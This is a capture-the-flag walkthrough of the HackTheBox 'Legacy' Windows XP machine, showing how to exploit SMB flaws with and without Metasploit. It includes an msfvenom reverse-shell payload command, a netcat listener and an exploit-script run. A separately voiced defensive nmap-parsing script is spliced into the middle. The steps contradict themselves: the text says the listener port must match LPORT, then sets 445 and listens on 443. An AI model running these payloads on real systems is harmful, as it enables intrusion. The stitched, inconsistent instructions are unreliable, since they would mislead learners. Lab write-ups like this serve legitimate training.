
HTB LEGACY WALK-THROUGH WRITE-UP (WITH AND WITHOUT METASPLOIT)


HackTheBox is an excellent platform for pentesters to improve their testing skills and knowledge.
Machine Level - Easy
Machine Name - Legacy
Machine OS - Windows
Machine IP - 10.10.10.4
Tools:
Nmap - Nmap is a fantastic tool for scanning open ports, identifying services and detecting the OS. You can use tools other than nmap (whichever you are more comfortable with) like masscan, SPARTA etc. to scan for open ports.
Metasploit - One of the most common and widely used tools pentesters use to launch exploits; it is maintained by Rapid7. Many books are available to understand the features of this tool.
We will be performing the attack with two methodologies (with and without Metasploit).
****************************************************************************************
Methodology 1 (using Metasploit)
Scanning the machine is the first step (i.e. enumeration). We use the following nmap command:
sudo nmap -T4 -p- -A 10.10.10.4
(run the command with sudo if an error about privileges occurs.)
The command scans all TCP ports (-p-) using timing template 4 (-T4, faster than the default) and enables OS detection, version detection, default scripts and traceroute (-A), which is where the version details come from.
We get the result shown in the figure. We can see various open ports. Further down, in the Host script results section, we can see:
We see that SMB is present, which is very juicy: SMB on old systems is frequently vulnerable and easy to exploit. We can also see that the victim machine is Windows XP. Since it is an SMB vulnerability, Metasploit can be used to launch the exploit.
So, time to fire up metasploit.
Type msfconsole in the terminal and search for smb_version.
Select module 0 with the use command as shown, then run the command "options" to see the available options.
Now set RHOSTS to the victim IP address and run the module as shown.
Here is the result of the version detection:
We can see that it is Windows XP SP2+.
Search Google for an SMB Windows XP SP2+ exploit (Rapid7 generally publishes msf modules).
Exploit link:
https://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapi
Scroll down to find the exploit in the module page and then copy the exploit.
Use the exploit as shown and see if you get a session.
Hooray! We got a session.
Now you can move around to look for the user and root flags.
Here's an example:
Type help to see the various operations you can perform.
Navigate through the files.
Get into the files.
To get the user flag:
Return back using cd ..\..\
To get the root flag, use the same method.
So that's it for this machine. We were able to get both the root flag and the user flag.
****************************************************************************************
Now we can also do this task without using Metasploit.
Methodology 2 (without using Metasploit)
The first step is the same as before: scan for open ports and find that the machine is vulnerable to MS17-010.
Now use the command locate *.nse | grep smb-vuln to find the nmap scripts related to smb-vuln.
You can see various MS17-010 exploits using the command searchsploit MS17-010.
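For a defender triaging the same scan results, it is more reliable to check the Host script results automatically than to read them by eye. The following Python snippet is an added example, not code from the original write-up: it parses nmap XML output (the -oX format) and reports every host where TCP/445 is open and a smb-vuln-* NSE script reported a "State: VULNERABLE" line, which is the signal that the host needs patching or isolation. The embedded XML is a constructed sample shaped like nmap's real output (the .5 and .6 hosts are made up), not a capture from the Legacy box.

```python
import xml.etree.ElementTree as ET

# Constructed sample in nmap's -oX format (not a real capture). The output
# strings mimic real smb-vuln-* NSE scripts, which print a per-check
# "State: VULNERABLE" or "State: NOT VULNERABLE" line.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
 <host><address addr="10.10.10.4" addrtype="ipv4"/>
  <ports><port protocol="tcp" portid="445"><state state="open"/></port></ports>
  <hostscript>
   <script id="smb-vuln-ms17-010" output="&#xa;  VULNERABLE:&#xa;  Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)&#xa;    State: VULNERABLE&#xa;"/>
   <script id="smb-vuln-ms08-067" output="&#xa;  VULNERABLE:&#xa;    State: VULNERABLE&#xa;"/>
  </hostscript>
 </host>
 <host><address addr="10.10.10.5" addrtype="ipv4"/>
  <ports><port protocol="tcp" portid="445"><state state="open"/></port></ports>
  <hostscript>
   <script id="smb-vuln-ms17-010" output="&#xa;  NOT VULNERABLE:&#xa;    State: NOT VULNERABLE&#xa;"/>
  </hostscript>
 </host>
 <host><address addr="10.10.10.6" addrtype="ipv4"/>
  <ports><port protocol="tcp" portid="445"><state state="filtered"/></port></ports>
 </host>
</nmaprun>
"""


def smb_vuln_hosts(xml_text):
    """Map each host with TCP/445 open to the smb-vuln-* scripts that
    reported 'State: VULNERABLE' (hosts with no hits are omitted)."""
    findings = {}
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        # Only an open 445 counts; filtered/closed ports are skipped.
        open_445 = host.find("ports/port[@protocol='tcp'][@portid='445']/state[@state='open']")
        if addr is None or open_445 is None:
            continue
        # "State: VULNERABLE" does not match "State: NOT VULNERABLE".
        hits = sorted(
            s.get("id") for s in host.iter("script")
            if s.get("id", "").startswith("smb-vuln-")
            and "State: VULNERABLE" in s.get("output", ""))
        if hits:
            findings[addr.get("addr")] = hits
    return findings


if __name__ == "__main__":
    for ip, scripts in smb_vuln_hosts(SAMPLE_XML).items():
        print(f"{ip}: SMB exposed and flagged by {', '.join(scripts)} -> patch or isolate")
```

Run the real scan with -oX out.xml and pass the file contents to smb_vuln_hosts to get the same per-host summary.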
Since we are avoiding the use of Metasploit we need to create a payload using msfvenom and save it in executable format (i.e. blue.exe).
The command is:
msfvenom -p windows/shell_reverse_tcp LHOST=X.X.X.X LPORT=445 -f exe > blue.exe
where you need to enter your IP address in place of X.X.X.X in LHOST. Hit enter to save the payload. This sets the payload windows/shell_reverse_tcp with listening port 445.
Now execute a Python script, passing it the victim's IP address and the payload we just created. To execute it you need the required files in the same location where you created the payload. The files are:
1) mysmb.py
2) send_and_execute.py
If some modules such as impacket are missing, install them using the command
pip install impacket
Back to the terminal. Now start a listener with the command below (the listener port must match the LPORT you set in the msfvenom command, otherwise the shell never connects back)
sudo nc -nvlp 443
Now launch the Python script (we run send_and_execute.py against the victim machine, passing it blue.exe, the payload to be executed, which contains our IP and listening port):
Let's check the listener for results:
Hooray! We are in the victim system; now you may perform the operations you intend to do.
Here's an example:
Get the user flag from the john directory.
Get the root flag from the Administrator directory.
That's all for this method.
We were successful in gaining access to the user and root flags through both methods.
Metasploit is pretty easy to use, but when you are restricted from using Metasploit you can follow the other method.

Thanks!
